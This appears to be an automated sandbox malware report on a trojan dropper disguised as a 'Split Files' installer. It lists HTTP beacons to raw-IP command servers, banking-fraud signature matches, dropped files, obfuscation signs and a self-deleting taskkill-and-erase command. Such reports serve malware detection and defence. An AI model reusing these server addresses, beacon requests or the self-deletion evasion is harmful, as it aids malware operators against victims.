                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 0
                    Host: 107.182.129.235
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    GET /storage/extension.php HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 107.182.129.235
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected (11 identical requests observed):
                    GET /library.php HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 2
                    Host: 171.22.30.106
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: SplitFiles131.exe, 00000002.00000002.337920488.000000000175A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                Source: Yara match | File source: 2.2.SplitFiles131.exe.3370000.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.3370000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00405F40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004150D3
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00415305
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004223A9
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00419510
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404840
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00426850
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00410A50
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0042AB9A
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00421C88
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0042ACBA
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00447D2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00428D39
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000F670
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000EC61
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe | Code function: 3_2_0131AE8D
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00408CA0 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00446194 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00445EC4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 0043477C appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00455D54 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00407988 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00455B64 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00451DE8 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: String function: 00405A9C appears 92 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00423C4C NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_004126A0 NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                Source: is-6A80U.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-6A80U.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-6A80U.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-HBEMJ.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-HBEMJ.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-HBEMJ.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000000.00000002.342802204.0000000000417000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe | Binary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Split Files\is-HBEMJ.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                Source: SplitFiles131.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D724E70,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D724E70,
                Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/39@0/5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | File read: C:\Users\desktop.ini
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_004547A0 GetModuleHandleA,6D295550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0040B090 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | File created: C:\Program Files (x86)\Split Files
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: `a}{
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: MFE.
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: ZK]Z
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Window found: window name: TMainForm
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: file.exe | Static file information: File size 2094367 > 1048576

                Data Obfuscation

                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406594 push 004065D1h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404229 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408BDC push 00408C0Fh; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040438C push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00409A20 push 00409A5Dh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040A107 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004785C8 push 00478673h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00410798 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004129F0 push 00412A53h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00450EB4 push 00450EE7h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F4BB push ecx; ret
                Source: SplitFiles131.exe.1.drStatic PE information: section name: .ave131
                Source: initial sampleStatic PE information: section name: .text entropy: 7.2455087113234224
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\is-HBEMJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\SplitFiles131.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0042425C IsIconic,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00417660 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00417D96 IsIconic,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\Desktop\file.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe; Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-HBEMJ.tmp
